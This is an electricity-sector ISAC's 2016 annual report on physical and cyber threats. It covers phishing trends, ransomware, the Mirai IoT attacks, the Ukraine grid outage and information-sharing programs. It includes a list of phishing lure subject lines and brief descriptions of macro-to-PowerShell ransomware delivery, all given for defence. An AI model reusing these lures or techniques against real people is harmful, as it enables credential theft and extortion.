e-isac end of year report

NERC | Report Title | Report Date I

E-ISAC End of Year Report

TLP: White

January 1–December 31, 2016

E-ISAC | E-ISAC End of Year Report | 2016 ii

Table Of Contents

Overview .....................................................................................................................................................................1

Chapter 1: E-ISAC Portal Activity ................................................................................................................................2

Portal Enhancements ..........................................................................................................................................2

E-ISAC Portal: A look at 2017 ..............................................................................................................................3

Chapter 2: Physical Security .......................................................................................................................................4

Overview .................................................................................................................................................................4

Issues and Activities ................................................................................................................................................6

Chapter 3: Cyber Security ...........................................................................................................................................8

Reporting Overview ................................................................................................................................................8

Analysis and Activities .............................................................................................................................................8

Chapter 4: CRISP ...................................................................................................................................................... 13

Overview .............................................................................................................................................................. 13

Chapter 5: Programs and Engagement ................................................................................................................... 14

E-ISAC Products and Services ............................................................................................................................... 14

E-ISAC Threat Workshop ...................................................................................................................................... 14

Grid Security Exercise (GridEx) ............................................................................................................................ 15

Grid Security Conference (GridSecCon) ............................................................................................................... 15

Cross-Sector Activities ......................................................................................................................................... 16

E-ISAC Monthly Briefing Series Update ............................................................................................................... 17

Chapter 6: Conclusion ............................................................................................................................................. 18

2017 Outlook ....................................................................................................................................................... 18

Appendix I ................................................................................................................................................................ 19

E-ISAC | E-ISAC End of Year Report | 2016 1

Overview

The Electricity Information Sharing and Analysis Center’s (E-ISAC’s) mission is to be a leading, trusted source that analyzes and shares electricity industry security information. The E-ISAC gathers security information, coordinates incident management, and communicates mitigation strategies with stakeholders within the electricity industry across interdependent sectors and with government partners. Throughout 2016, the E-ISAC collected, analyzed, and shared information on physical and cyber security issues, and this report is a review of the main issues covered over the year. The information came from open source reporting, electricity members, and federal partners and includes the E-ISAC’s analytical summary of those collective reports. This report looks at how the E-ISAC may further identify trends and patterns benefitting members.


Chapter 1: E-ISAC Portal Activity

In September 2015, the E-ISAC portal1 underwent a significant transition from a limited content management-based platform to a web application focused on establishing several cyber and physical threat collaboration capabilities for members. These capabilities improved the means by which the E-ISAC shares information with its members while also offering additional scaling and efficiencies. The portal continues to improve and gain new users. In 2016 alone, the E-ISAC registered 1,512 new users to the portal. Figure 1.1 represents how many users have viewed each type of document.

Figure 1.1: Number of Views by Type of Post The most popular views by members were documents, including weekly reports and analytical assessments posted by the E-ISAC. In 2016, 1,525 unique users downloaded 713 different documents 18,555 times. The top downloaded document of 2016 was the E-ISAC/SANS Ukraine Defense Use Case.2 This 29-page report “summarizes important learning points and presents several mitigation ideas based on publicly available information on ICS incidents in Ukraine.” Physical bulletins may have received fewer views for several reasons: fewer physical security users are active on the portal, fewer physical security events occurred, or fewer physical security incidents were reported. As the E-ISAC continues to collect portal activity data, the information will assist the E-ISAC in recruiting new members to the portal and determining how the E-ISAC can best serve members’ interests and needs.

Portal Enhancements While the E-ISAC portal underwent significant changes in 2015, the E-ISAC continued to modify and improve

functions during 2016. Earlier in the year, E-ISAC led an effort to retire the North American Electric Reliability

Corporation (NERC) legacy Critical Infrastructure Protection Information System, transferring approximately 400

1 https://www.eisac.com/ 2 https://www.eisac.com/Collaboration#/document/4185

Blogs , 12029

Cyber Bulletins , 9354

Discussions , 2842

Documents , 16070

Events , 52

News , 8343

Physical Bulletins , 4373

View by Posting Type

https://www.eisac.com/Collaboration#/document/4185

https://www.eisac.com/


Chapter 1: E-ISAC Portal Activity


users to using solely the E-ISAC portal for threat collaboration. In addition, the portal went through both functional

and security reviews to assess key stakeholder areas and help inform portal strategy. The value and priority of

nearer-term improvements factored in member input, and this involved discussions and demonstrations with

Electricity Subsector Coordinating Council (ESCC) working group members, including the Member Executive

Committee (MEC). From these discussions, the E-ISAC delivered enhancements in 2016, such as:

Collaboration Facility:

Adding dashboard with current E-ISAC reports and member requests for information

Improving posting, sorting, and filtering

Updating posting listings layout

Updating the portal user guide3

Sharing Functions:

Allowing members to export indicators into comma-separated value files after posting

Offering option to post to “E-ISAC Staff” for very sensitive traffic light protocol (TLP): RED posts

Allowing E-ISAC staff to edit E-ISAC posts without generating extra notification traffic

Checking boxes automatically of available recipients for a chosen TLP color sensitivity

Displaying information about selected document types during post creation

Improving email notification format

Providing easier access from external reference links to portal content

Security:

Instituting a required 90-day password refresh feature, including an advanced notification and lock-out sequence

Adding security improvements

E-ISAC Portal: A look at 2017 The E-ISAC will continue to implement smaller, discretionary improvements on the current portal and, in 2017,

the E-ISAC may select and migrate toward a more mature and capable platform solution.

3 https://www.eisac.com/Content/attachments/help_manual.pdf

https://www.eisac.com/Content/attachments/help_manual.pdf

https://www.eisac.com/Content/attachments/help_manual.pdf


Chapter 2: Physical Security

Overview E-ISAC physical security analysts capture, analyze, and disseminate physical security incidents reported by electricity industry members to fellow E-ISAC members, law enforcement, and government agencies. The information is disseminated in a nonattributed format and is valuable in ongoing situational awareness, detection, and prevention of similar incidents. The physical security analysts also provide reporting and analysis regarding sector-relevant global incidents. Gathering more shared physical security information became an increased priority in 2014, which improved analysis and actionable shares on the portal.

Trends and Analysis Members reported 174 physical security incidents to the E-ISAC physical security analysts in 2016. 93 of these were reported in the first half of the year and 81 in the second half. This difference is minor and could demonstrate a more stable reporting rate than 2015, during which reporting increased significantly the second half of that year. The physical security analysts reviewed the reports from all segments of the industry by month, region, and event type. The analysts examined a more detailed regional breakdown of reports and monitored trends including copper theft and surveillance.

Regional Analysis The Regional Entities include members from all segments of the electric industry, including investor-owned utilities, federal power agencies, rural electric cooperatives, state, municipal, and provincial utilities, independent power producers, power marketers, and end-use customers. Members from the Western Electricity Coordinating Council (WECC), SERC Reliability Corporation (SERC), and Northeast Power Coordinating Council (NPCC) Regions reported the highest number of events to the E-ISAC (see Figure 2.1). Over 25 percent of both WECC and SERC members reported directly to the E-ISAC, which signifies an increase in voluntary reporting from those Regions in 2015. Overall, 22 percent of the incidents reported were reported to the E-ISAC directly. Other sources of the reports were RCIS, OE-417s, and EOP-004s While the E-ISAC does not have sufficient data from 2015 to accurately compare the two years, the analysts assessed a slight increase in direct reports. These direct reports were often phone calls during incident response, emails sharing details, such as pictures and law enforcement engagement, or members voluntarily posting incidents to the E-ISAC portal. The physical security analysts’ outreach efforts and timely bulletins to industry were pivotal in creating a trusted environment for voluntary sharing, and the E-ISAC benefited from regular correspondence from security managers throughout the Regions.



Figure 2.1: Regional Breakdown of Physical Security Incidents Trends The analysts reviewed events by overall type by using the following categories: threat, gunfire, intrusion, surveillance, suspicious activity, theft, threat, and vandalism. Incidents that fell into multiple categories were categorized based on the intent of the action. See Figure 2.2.

Figure 2.2: Breakdown of Physical Security Incidents

Activities falling under “Gunfire” and “Suspicious Activity” were the most prominent event types in 2016. Gunfire incidents have been a regular occurrence throughout the sector, and SERC and WECC had the most gunfire-related incidents. Security managers commented that gunfire damage is often only discovered during routine inspections because they do not typically cause enough damage to trigger immediate action. Most gunfire incidents occurred at substations in remote areas and were reported to be caused by local hunters or youth.

0

10

20

30

40

50

60

Security Incidents by Region

Gunfire, 21%

Intrusion, 18%

Other, 1%

Surveillance, 13%

Suspicious Activity, 21%

Theft, 16%

Threat, 5%Vandalism, 5%

Type of Incidents: 2016



Copper Theft In 2016, the E-ISAC received 27 reports of theft, and over 70 percent of these incidents involved copper. More than half of these incidents occurred in the WECC region. Figure 2.3 shows copper theft by month with no noticeable trends. However, the price of copper increased 24 percent in 2016, which may trigger more copper theft incidents in 2017.

Figure 2.3: Copper Theft Trends

Surveillance Members reported 23 incidents involving surveillance. These incidents often involved photography, unmanned aircraft system (UAS) flyovers, vehicle drive-bys, and social engineering. Incidents involving surveillance are often considered a “non-event,” as members of the public often enjoy taking photographs of infrastructure. However, these reports are integral to creating an accurate threat picture. Surveillance may assist entities in preparing for follow-on criminal activity ranging from copper theft to vandalism, or even an attack on the facility itself. These reports are often provided voluntarily to the E-ISAC because they do not always meet reporting criteria.

Issues and Activities During 2016, the physical security analysts provided coverage of national and international security-related events, emerging threats, and international terrorism trends. National trends of interest in 2017 included UAS incidents and international interest was focused on terrorist activities impacting or potentially impacting North America.

UAS Throughout 2016, the electricity industry discussed UAS regularly because they are a present and relevant security threat to industry. The E-ISAC collects UAS incident data to provide a threat picture to its members. In early 2016, the E-ISAC published a threat bulletin update on UAS.4 Current federal statutes and regulations provide for limited enforcement of UAS use within the National Airspace System. In August 2016, the Federal Aviation Administration (FAA) hosted an information session regarding reporting information and legislation updates. The E-ISAC provided this information to members via weekly reports and monthly member briefings. The E-ISAC requests that members continue to report UAS incidents, surveillance, and other suspicious activity to the E-ISAC and the FAA to help provide a more complete and accurate threat picture. Local FAA reporting information is available on the portal.

4 https://www.eisac.com/Collaboration#/document/4114

0

1

2

3

4

5

Copper Theft




Terrorist Activities During 2016, the E-ISAC closely followed terrorist activities impacting North America; fortunately, none of these activities impacted the operation of the electric grid, but keeping members aware of various tactics, techniques, and procedures (TTP) is important to understanding and mitigating threats. The E-ISAC tracked activities of Al Qaeda in the Arabian Peninsula (AQAP) and the Islamic State of Iraq and the Levant (ISIL). In November 2016, AQAP published the 16th edition of Inspire, an online propaganda magazine that discusses ways in which individuals can conduct terrorist activities. The magazine has historically mentioned targeting critical infrastructures, which is why members should be aware of the content included in these types of publications. A safe download of the magazine is available on the E-ISAC website.5 Also in November, the E-ISAC tracked events occurring at Ohio State University, where an attacker used TTPs commonly used by ISIL. In this instance, the attacker used vehicle ramming and knife attacks in a heavily populated area on campus. Not surprisingly, these TTPs are mentioned in the AQAP publication. ISIL later came out and claimed responsibility for the Ohio State University attack. As a result of that attack, the E-ISAC physical security analysts released a product discussing the use of these TTPs and mitigation strategies. E-ISAC analysts believe the use of these TTPs will only increase and therefore awareness, vigilance, and countermeasures are critical in protecting against these threats.

Physical Security Advisory Group (PSAG) The PSAG has 22 members comprised of senior security leaders and observers from industry and government who possess over 600 cumulative years of experience. The E-ISAC leads and facilitates the PSAG, which serves to advise industry on threat mitigation strategies to enhance bulk power system physical security and reliability. The PSAG develops products for industry that focus on security operational plans, policies and procedures, evolving security technologies, training, incident response and management, and more. In 2016, the PSAG continued work on initiatives and documents, such as the Enhanced Background Screening initiative, the Design Basis Threat document, Security Management in the Electricity Sub-Sector, a whitepaper on transmission line corridor security, and UAS research. The group enhanced these products through regular coordination with the Department of Homeland Security (DHS) and the Department of Energy (DOE). Finally, in December 2016, the PSAG worked with DOE and the Pacific Northwest National Labs as well as the DHS to update the Design Basis Threat document with the current threat landscape and to make updates as necessary. The revised document will be posted on the E-ISAC portal in early February 2017.

Physical Security: A look into 2017 The E-ISAC encourages its members to report all activities or observations that appear out of the ordinary; reporting helps the team discover patterns and assess the overall threat picture across the continent. Accurate trend analysis is impossible without sufficient data. E-ISAC physical security analysts continue to reach out to its members by presenting physical security threat information to various Regions by request and discussing evaluation trends with them. This outreach fosters relationships with security staff and demonstrates the value of the reports they share. Regions that provide more direct reporting benefit from a more accurate view of the incidents and any possible connection(s) between them. The physical security analysts welcome suggestions for expanding analytic capabilities and industry outreach that benefits industry. Email suggestions or requests to [email protected].

5 https://www.eisac.com/collaboration#/blog/5499

mailto:[email protected]

https://www.eisac.com/collaboration#/blog/5499


Chapter 3: Cyber Security

Reporting Overview The E-ISAC continues to share relevant cyber security information with its members via the E-ISAC portal. This year, 241 cyber bulletins were posted to the E-ISAC portal. Of the 241 cyber bulletins, 210 were posted based on information provided by members or posted by members themselves. This trend is consistent with the 218 cyber bulletins in 2015. The E-ISAC hopes to see this number increase in 2017 as member participation increases. The E-ISAC also posted several bulletins based on information obtained from government partners and trusted open source partners. Like 2015, the second quarter (Q2) of 2016 saw the most portal posts based on information provided by members.

Analysis and Activities Just under half of the reports from members involved phishing incidents. Other important trends and analysis conducted throughout the year focused on the Dridex campaign, ransomware, and the Internet of Things (IoT). The E-ISAC also monitored several important cyber events in 2016, including malicious cyber acitivites by the Russians and a power outage in Ukraine

Phishing In 2016, over 40 percent of cyber bulletins posted were about phishing, and this trend is consistent with what the E-ISAC observed in 2015, as indicated in Figure 3.1. These phishing emails contained information relating to the Dridex campaign, html credential harvesting, Gh0st RAT, Locky, typosquatting, whaling, and vawtrak attempts. Phishing is expected to remain a prevalent delivery method for cyber-attacks. End-user training and email monitoring technology are ways that members can combat this threat.

Phishing Themes Reported in 2016

* Scanned Document * Wire transfer * Social Security * Letter Response * New Order * Quicken Bill * Contest winner * Visa Rewards * Invoice * AMEX * Remittance * Emailed Invoice * Payroll * FedEx * debt collection notice * Docusign * Account Terminated * AW: New Order * Tax Invoice * Updated Agreement * Dispatched Purchase Order * meeting * Amazon * Order delivery before 21st July * Sign the Document * The Office of The Attorney General Complaint * Integrated Control Systems * General Liability & Workers Compensation Insurance * Suspicious activity on your PayPal Account * Re: order delay * Disabled account threat * Good news everyone * Property Offer * Healthy Living * Word Document * IT Service * Google Doc *Law Suit 1808.* charge on my card * WE RECEIVED INVALID CREDETIALS FROM YOU - UPGRADE NOW * Accounts Documentation: Invoices * Voicemail from Anonymous * yourlifeupdateinfo * Office 365 * File from a Dropbpox user * you have 1 important update at your message center * important Message to Avoid Temporary Block on Your Card

Phishing, 41%

Other, 59%

Cyber Bulletins

Figure 3.1: Phishing Cyber Bulletins



NERC Alert On February 9, 2016, the E-ISAC provided subject matter expertise to develop the NERC alert Mitigating Adversarial Manipulation of Industrial Control Systems as Evidenced by Recent International Events. The alert shared techniques observed in the attacks that took place in Ukraine in December 2015: spear phishing, credential harvesting and lateral movement, unauthorized remote access, telephony denial of service, and sustaining persistent access. Most of these same tactics and techniques were used in a subsequent series of attacks against Ukraine in December 2016. The techniques used against Ukraine have several options for remediation and prevention:

Spear Phishing with Malicious Attachment: Disabling macros in Microsoft Office productivity software. Also, recurring training in reacting to social engineering attempts is vital.

Credential Harvesting: Instituting password length and change requirements as well as domain controller and privileged account monitoring may reduce the chance of successful credential harvesting attempts.

Lateral Movement and Remote Access: Implementing “Least Privileges,” “Separation of Duties,” layered network segmentation and monitoring of privileged accounts and the use of remote administrative tools (e.g. PowerShell, SysInternals).

Dridex Campaign Several cyber bulletins and discussions in March were related to Dridex, a financial trojan that steals banking credentials. Multiple members reported a phishing campaign that was comprised of thousands of emails, each containing macro-enabled attachments. Members shared over 70 indicators connected to the campaign, including methods to automatically detect the malicious attachment that was comprised of distinct file naming conventions.

Ransomware Since the beginning of 2016, E-ISAC reporting and media coverage pointed to a significant increase in ransomware-specific cyber extortion activity. Ransomware is a special class of disruptive, malicious software designed to deny access to data and files until the victim meets payment demands. Once compromised, the victim may have to restore systems from back-up tapes or pay the ransom with the hope of regaining access to the data and files. In response to the prevalence of ransomware across all critical sectors and its destructive capabilities, the E-ISAC provided subject matter expertise in a NERC alert that was issued in June 2016.6 The E-ISAC also released a detailed assessment7 on May 11, 2016, and outlined the evolution of ransomware tactics. This E-ISAC assessment provides:

An threat assessment and outlook that is electricity industry centric;

A brief technical background and context to ransomware;

Observed activity that is electricity industry specific, and

Recommended mitigation options.

The E-ISAC is aware of at least one case in 2016 in which ransomware included industrial control system themes and delivered malicious payloads. From an attacker’s perspective, a successful attack on critical operational technologies may yield an exceptionally high ransom and an increase in likelihood of the ransom being met.

6 https://www.eisac.com/collaboration#/news/4640 7 https://www.eisac.com/collaboration#/document/4520

https://www.eisac.com/collaboration#/news/4640

https://www.eisac.com/collaboration#/document/4520

https://www.eisac.com/collaboration#/news/4640

https://www.eisac.com/collaboration#/document/4520



In April 2016, a cyber-attack caused by ransomware occurred against Lansing Board of Water and Light’s (BWL) corporate network. The attack forced BWL to shut down its accounting system and email services for about 250 employees. Phone services also went down, but customer data remained secure. Additionally, there were 62 Cybersecurity Risk Information Sharing Program (CRISP) investigations that stemmed from ransomware indicators, resulting in 10 CRISP all-site reports. The E-ISAC assesses with medium confidence that extortion tactics will increase generally across all sectors, and ransomware may become the financially-motivated malware of choice, surpassing banking credential harvesting.

PowerShell Dubbed “PowerWare” by researchers as it emerged in the spring of 2016, ransomware based on the Windows PowerShell scripting language is now common. Although new to ransomware, the malicious use of extant computer language compilers on victim systems dates back to C programming language on systems in the 1980s. During the 1990s, it was common to delete compilers on production servers to combat their malicious use. Ransomware is often delivered via macro-enabled Microsoft Office documents. Embedded macros within the documents spawn the PowerShell activity in the background and are invisible to the user. PowerShell then downloads and executes the PowerWare code. Various options available at run-time to PowerShell are shown in Figure 3.2 below.

Figure 3.2: Windows PowerShell Early versions of PowerWare—a component of the larger Cryptolocker ransomware threat that became prevalent in 2015—were defeated by locating the keys used to encrypt the victim system’s files using a network analyzer, such as WireShark, as the keys were transmitted to one of several command-and-control systems in cleartext. System backups only partially work as a remedy because ransomware variants can also attack un-mapped network drives and cloud-based assets that may not be included in backup routines. In 2017, the E-ISAC will continue to monitor this threat and provide relevant and timely information and updates to members.



IoT Serious concerns surround the security of devices designed to be used as part of the IoT. Cyber security practitioners generally agree that most IoT devices connected to the internet are likely to be a target because they generally don’t have security as an important part of their design process. Due to the highly interconnected and unauthenticated state of the IoT, the lack of sufficient security design in consumer products and toys can be leveraged against critical systems accessible from the internet. The use of a large number of IoT devices can be harnessed from all areas of the internet rather than a small number of networks. This massive scale of the devices has successfully generated attack throughput rates on the order of several hundred megabits-per-second to one terabit-per-second (tbps) throughput or more. The October 21, 2016, distributed denial of service (DDoS) attack against the Dyn-managed domain name system (DNS) infrastructure resulted in 1.2 tbps of network throughput (also referred to as “bandwidth”) being used against the DNS address provider’s infrastructure. Malware, such as Mirai, will continue to grow, as the overall throughput of the Internet providers’ infrastructure will be the ultimate limiting factor. A level 2 NERC alert, published on October 11, 2016, was concerned with issues with IoT devices that are connected to the public Internet. Additional information concerning the alert is available for members at the TLP: AMBER level.8 On October 24, 2016, the E-ISAC released its Internet of Things DDoS White Paper in conjunction with the level 2 NERC alert. In late 2016, existing attack surfaces and new malware payloads were exploited in unique ways by using custom attack software. The attacks highlight the scale of network bandwidth that can be unleashed upon connected systems with multiple attacks generating over one tbps. Additionally, CRISP data provided the E-ISAC further insight. After the IoT DDoS activity in October, CRISP participants saw a significant increase of scanning activity observed over ports 23, 2323, and 7547. The following ports have been attributed to the recent IoT (Mirai) DDoS: Percentage of change since October 2016:

Port 23: ~8 billion records increased to ~40 billion

Port 2323: ~6 million records increased to ~6 billion

Port 7547: ~12 million records increased to ~2.5 billion The E-ISAC developed recommendations for defensive capabilities in the electricity industry with suggestions to improve the overall posture of network security and cyber security within its community. The document is available for download on the E-ISAC portal here.9

GRIZZLY STEPPE On December 29, 2016, DHS and the Federal Bureau of Investigation (FBI) released a Joint Analysis Report (JAR) titled, “GRIZZLY STEPPE - Russian Malicious Cyber Activity,” that provided details of the tools used by Russian intelligence services to compromise and exploit networks and endpoints associated with the United States election as well as a range of U.S. government, political, and private sector entities. The JAR also included recommended mitigations and information on how to report such incidents to the U.S. government. The E-ISAC analyzed the indicators of compromise (IOC) provided by government intelligence for potential malicious network traffic that may affect the electricity industry.

8 https://www.eisac.com/collaboration#/cyberBulletin/5275 9https://www.eisac.com/Collaboration#/document/5365


https://www.eisac.com/collaboration#/cyberBulletin/5275




On December 30, 2016, The Washington Post released an article alleging that a utility was infiltrated by “the Russian military and civilian services.” The report linked an Internet Protocol address referenced in the FBI/DHS Joint Analysis Report to activity observed by a utility. The address in question was included in the list of IOCs. The initial article in The Washington Post reported incorrectly that the electric grid had been penetrated through a Vermont utility. Burlington Electric Department released a statement indicating that a potentially compromised laptop had not been connected to the grid, and The Washington Post subsequently corrected its article. The utility conducted further analysis and investigation, determining that the incident was not linked to any effort by the Russian government to target or hack the utility. Based on information currently available, the E-ISAC believes that neither the electricity industry nor this particular utility were targeted by this cyber-attack. The information points to this activity as part of a broader, untargeted campaign searching for vulnerable computers to exploit. Both the wide range in age of indicators in question and the fact that addresses belonged to content providers, cloud computing providers, and internet service providers in addition to private companies and individuals, made the connection of any activity difficult to substantiate as belonging to a particular actor.

Ukraine Late on December 17, 2016, to early December 18, 2016, Ukraine's state-owned national power company Ukrenergo experienced an outage at an electrical substation in the northern part of the capital city of Kyiv. Service was restored as a result of manual operator intervention. The initial cause of the outage was deemed the result of a cyber-attack as indicated by the acting Chief Director of Ukrenergo, according to open source reporting. Researchers have subsequently confirmed during a presentation10 at the S4x17 conference on January 11, 2017, that the outage was the result of operations that occurred during the end of a protracted campaign that began December 6 and lasted through December 20. This campaign included remote access and denial-of-service attacks against systems belonging to the transportation, energy, and government sectors in Ukraine. Investigators indicated that members of "several cybercriminal groups" had collaborated on the attack.

Cyber Security: A Look into 2017 The major events of 2016, along with the trends highlighted in this report, emphasize the importance of user training and individual vigilance. The E-ISAC can assist members in determining the nature of any threat, whether real or perceived. If members provide more information and reporting to the E-ISAC, the E-ISAC can provide better analysis and information sharing.

10 http://www.darkreading.com/threat-intelligence/latest-ukraine-blackout-tied-to-2015-cyberattackers/d/d-id/1327863

http://www.darkreading.com/threat-intelligence/latest-ukraine-blackout-tied-to-2015-cyberattackers/d/d-id/1327863

http://www.darkreading.com/threat-intelligence/latest-ukraine-blackout-tied-to-2015-cyberattackers/d/d-id/1327863


Chapter 4: CRISP

Overview CRISP participant companies serve approximately 75 percent of electricity consumers in the United States. All E-ISAC members benefit from the information gathered regardless of CRISP membership status. The E-ISAC shares CRISP data with users of the secure E-ISAC portal in the form of cyber bulletins. The E-ISAC is involved in several DOE initiatives, one of which is the enhancement of CRISP to provide more useable information to smaller utilities, such as municipal utilities and cooperatives that currently may not participate in the program. The E-ISAC’s work, along with the DOE’s, is part of the natural maturation of the capabilities of the E-ISAC. The quantity, quality, and timeliness of the CRISP information exchange allows the industry to better protect and defend itself against cyber threats and to make the bulk power system more resilient. In 2016, CRISP identified intrusion methods used by threat actors with a wide variety of technical prowess and continued to identify and monitor activities of threat actors and their escalating risk to the U.S. electricity industry. CRISP provided reporting readily available to the general public on current trending issues, including BlackEnergy, ransomware, and IoT.

CRISP Statistics CRISP uses many different sources of threat reporting to identify potential IOCs. This year, over 80 percent of CRISP investigations opened were predicated on government informed reports. In 2016, the E-ISAC saw 41 cases predicated on IOCs provided by CRISP participants that resulted in all-site reports. CRISP all-site reports leverage ISD data and all-source intelligence to provide actionable information to support security operations across the CRISP community with company-specific information removed. This increased information sharing resulted in enhanced awareness and increased security of CRISP participants. Additionally, anonymized information CRISP shared back to the intelligence community led to the discovery of compromised systems. Table 4.1 details the reporting statistics for 2016.

Table 4.1: CRISP 2016 Reporting Statistics

Product 2016 Total

Cases Opened 1,480

Analyst Generated Reports 179

Site Annexes 412

Automated Reports ~160,000

In 2016, the CRISP program and analysts:

Queried and tracked over 18,000 high value threat indicators;

Processed over 250 terabytes of data; and

Provided supply chain research in response to participant’s requests.


Chapter 5: Programs and Engagement

E-ISAC Products and Services The E-ISAC completed its first year working with the MEC, an ESCC group that consists of three chief executive officers and eight chief information/security officers. This group provides strategic guidance to improve and enhance the E-ISAC, particularly in the areas of the products and services the E-ISAC offers to its members. The MEC meets quarterly and has two working groups that help refine and implement its recommendations. The two working groups are: the Member Engagement, Products, and Services (MEPS) Working Group and the Operations, Tools, and Technologies (OTT) Working Group. In March 2016, the MEC and the E-ISAC finalized a 2016 work plan, which contained several important items for the E-ISAC to address. Some of those items included:

Publish a “How To” Guide: The E-ISAC developed three documents: the E-ISAC brochure, which is a high-level overview of the E-ISAC and the benefits of becoming a member of the E-ISAC; a document titled Engaging the E-ISAC, which provides more detail about the E-ISAC to individuals who are not yet members; and a document titled Understanding Your E-ISAC, which describes everything stakeholders need to know to benefit from the myriad products and services available through E-ISAC membership. All three documents are available on the main page of the E-ISAC portal.

Develop a Prioritized List of E-ISAC Products And Services: To better understand all that the E-ISAC creates and does for its members, the MEPS requested a full list of products and services in which the E-ISAC is engaged; the MEPS then reviewed this list based on the need and utility of each of the products and services. The final list of products and services is available on page 10 of Understanding Your E-ISAC.

Define the E-ISAC’s Role in Classified/Threat Briefings: The E-ISAC worked with its government partners to outline the E-ISAC’s role with the government in facilitating classified/threat briefings. While the E-ISAC does not own the data presented during threat briefings, the E-ISAC does work closely with its government partners to schedule and facilitate threat briefings for industry. In addition to defining this role, the E-ISAC also held its first threat workshop in December (additional information below).

Pilot Automated Information Sharing: The E-ISAC recently initiated its Cyber Automated Information Sharing Service (CAISS) pilot program. The technology behind CAISS provides a standardized, automated, and centralized threat intelligence sharing platform designed to reduce analyst’s time to understanding threat information and taking action to address it. As of December 31, 2016, the E-ISAC had seven members involved in the project; companies interested in joining the pilot may contact the E-ISAC at [email protected], or (404) 446-9780 #2.

Initiate Improvements to the Portal: One significant change E-ISAC members will see in 2017 is adjustments to the portal. In 2016, the E-ISAC worked with the OTT to develop requirements to enhance portal functions, in 2017, the E-ISAC will move from a portal to a platform. Through much of 2016, the E-ISAC talked with stakeholders about what they would like to see in a new platform. The E-ISAC will implement these changes in 2017.

While enhancing the E-ISAC’s products and services will be an ongoing activity, the E-ISAC, the MEPS, and the OTT made great progress in 2016 to address and implement the MEC recommendations and work plan items.

E-ISAC Threat Workshop As a result of planning and discussions with representatives from the MEPS, the E-ISAC will host and moderate an unclassified threat workshop twice each year. These threat workshops will bring together security experts from government and industry to discuss threats facing the electricity industry. The discussions may include a focus on




past threats, incidents and lessons learned, current threats that may impact industry, or views on emerging threats. The threat workshop series will occur in June and December of each year in different parts of the United States and Canada. To maximize information sharing with asset owners and operators (AOO), the workshops will include discussions between presenters and attendees during each briefing with E-ISAC analysis of the topics raised and will dedicate time to industry discussion after the briefings. The discussions will allow AOOs to discuss their own experiences that addressed a particular threat, share best practices, and ask questions of other AOOs with respect to mitigating threats. While the workshop is unclassified, the discussions may reach the TLP: RED level, which is why attendance is limited to AOOs. All attendees will participate with the understanding that information shared will not be attributed outside of the meeting space. Attendees for the workshop series will include AOO E-ISAC members who have an active E-ISAC portal account and serve in the following roles: operational, cyber and physical security analysts, general managers of local utilities, security supervisors, chief security officers, chief information officers, chief information security officers, and security directors. The E-ISAC held its first threat workshop on December 6, 2016, in Washington, DC. Approximately 30 E-ISAC members attended to hear from representatives from DHS, DOE, the FBI, and the National Security Agency. In addition, E-ISAC members heard from E-ISAC analysts about cyber and physical threats and other activities they see on a daily basis. The next workshop is scheduled for June. More details will be available on the portal in March 2017.

Grid Security Exercise (GridEx) In March 2016, the E-ISAC released three reports regarding the lessons learned on GridEx III. The first report is available in the Public Document Library on the E-ISAC portal at www.eisac.com.11 The second report is TLP: AMBER and is available to AOO members on the secure E-ISAC portal. The third report is a TLP: AMBER executive tabletop report, which was shared only with the participants of the tabletop, the NERC Board of Trustees, the ESCC, the Reliability Issues Steering Committee, and the NERC Critical Infrastructure Protection Committee (CIPC) Executive Committee. These reports summarize the exercise and provide recommendations that the E-ISAC has integrated into its internal crisis action plan and standard operating procedures. In addition, the ESCC has adopted many of the recommendations into its playbook. GridEx IV initial planning is already underway to ensure that all AOOs are able to participate in the manner of their choosing. The E-ISAC hosted over 200 GridEx IV planners at the initial planning meeting on November 14, 2016. Future GridEx IV planning dates include:

Mid-Term Planning Meeting: February 10, 2017

Final Planning Meeting: May 1, 2017

GridEx IV: November 15-16, 2017

Grid Security Conference (GridSecCon) The E-ISAC hosted over 400 electricity cyber and physical security professionals in Quebec City, Canada, October 17-23, 2016. GridSecCon 2016 provided free training on both physical and cyber security issues and technologies, such as Ukraine, Grassmarlin, and Cyber Attack Defense Training Exercise for the Grid. The conference included

11 www.eisac.com

http://www.eisac.com/

http://www.eisac.com/



speaker sessions discussing industry’s work with government partners, space weather, hunting and killing on networks, and advanced research and development in the sector.

GridSecCon 2017 Dates:

Request for presentations/Speakers Distributed: February 2017

GridSecCon 2017: October 17-20, 2017: St. Paul, Minnesota

Cross-Sector Activities The E-ISAC engages with the government at all levels, including international, federal, state, local, territorial, tribal, and provincial governments. It is also close allies with critical infrastructure protection sector partners and other ISACs. During 2016, the E-ISAC’s federal partners were active in response to Presidential Policy Directive 41: United States Cyber Incident Coordination and created projects covering cyber mutual assistance, high profile exercises, cyber incident response plans, learning opportunities for E-ISAC staff, and power outage incident technical reference products. The E-ISAC worked closely with our federal partners in support of their activities and provided feedback where appropriate, such as with the recently updated National Cyber Incident Response Plan (NCIRP). The E-ISAC has also maintained participation with the National Cyber Security and Communications Integration Center, the National Integration Center, and the National Operations Center. Through the National Council of ISACs (NCI), the E-ISAC is able to collaborate with all critical infrastructure-specific ISACs. The E-ISAC assisted the NCI in establishing new information sharing procedures and collaborative analytical approaches. This partnership helped lead to additional threat briefing opportunities and increased information

https://www.us-cert.gov/ncirp



sharing. Furthermore, this partnership allowed the E-ISAC to provide additional insight and analysis on key issues, such as Ukraine and the IoT emerging issues. This year, the E-ISAC hosted approximately 20 visits to the E-ISAC from AOOs and cross-sector partners. The E-ISAC also helped develop TLP Guidance used by US-CERT and is currently developing common language for all ISACs to use when discussing TLP: Amber information.

E-ISAC Monthly Briefing Series Update The E-ISAC continues to host its Monthly Briefing Series for AOOs, covering timely critical infrastructure protection topics for participants. The briefings involved federal and technical partners, including Department of Homeland Security staff from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Office of Intelligence and Analysis, and the National Cybersecurity and Communications Integration Center (NCCIC), as well as FireEye and iSIGHT Partners. The Monthly Briefing Series also includes special guest presentations. During 2016, the E-ISAC invited members, federal and private partners, national labs, and other guests to discuss the following topics:

2016: January–June

Starting the Hunt: Using the Hunting Maturity Model to Develop Capability

ICS Security Operations Center Initiative

Applying the National Institute of Standards and Technology Cybersecurity Framework: Update and Lessons Learned (an AOO Member presentation)

GridEx III Lessons Learned

Cyber Security Testing with the National Guard (an AOO Member presentation)

Primer: ICS Active Defense 2016/July–December

Design Basis Threat: Tool developed by the E-ISAC Physical Security Advisory Group

Communications Sector Preparedness and Disaster Recovery

Critical Infrastructure Cyber Incident Response: Insights and Best Practices

National Cyber Security Awareness Month: Themes, Updates, and Engagement

Shodan for Critical Infrastructure Defenders

2015 Attacks on Ukrainian Critical Infrastructure (November 2016 updated report)
